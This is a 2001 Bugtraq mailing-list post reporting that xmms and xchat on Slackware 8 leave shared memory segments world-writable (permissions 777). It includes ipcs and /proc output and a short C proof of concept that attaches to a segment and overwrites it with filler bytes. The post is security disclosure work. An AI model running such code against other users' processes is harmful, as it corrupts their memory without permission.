7430047 2001-11-03 12:22 +0200 /67 rader/ Julien VANEGUE <vanegu_j@epita.fr> Sänt av: joel@lysator.liu.se Importerad: 2001-11-05 03:42 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Externa svar till: vanegu_j@epita.fr Mottagare: Bugtraq (import) <19669> Ärende: xmms/xchat full access shared memory segments ------------------------------------------------------------ From: Julien VANEGUE <vanegu_j@epita.fr> To: bugtraq@securityfocus.com Message-ID: <0111031122230M.12122@daril> On slackware 8 : bash-2.05$ ipcs -m ------ Shared Memory Segments -------- key shmid owner perms bytes nattch status 0x00000000 4216960 mayhem 777 196608 2 dest 0x00000000 7636737 mayhem 777 196608 2 dest bash-2.05$ ipcs -p -m ------ Shared Memory Creator/Last-op -------- shmid owner cpid lpid 4216960 mayhem 3921 1406 7636737 mayhem 26206 26209 bash-2.05$ cat /proc/3921/cmdline ; echo /opt/gnome/bin/xmms bash-2.05$ cat /proc/26206/cmdline ; echo /opt/gnome/bin/xchat bash-2.05$ Seems not to be exploitable (no fault) but still need to be fixed . /* ** test_shm.c ** ** Made by Julien Vanegue ** Login <mayhem@hert.org> */ #include <sys/types.h> #include <sys/ipc.h> #include <sys/shm.h> #include <stdio.h> #include <stdlib.h> #define FATAL(str) { perror(str); exit(-1); } void usage() { fprintf(stderr, "syntax: a.out semid size \n"); exit(-1); } int main(int argc, char **argv) { char *addr; if (argc != 3) usage(); if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1) FATAL("shmget"); memset(addr, 'A', atoi(argv[2])); sleep(2); } (7430047) /Julien VANEGUE <vanegu_j@epita.fr>/------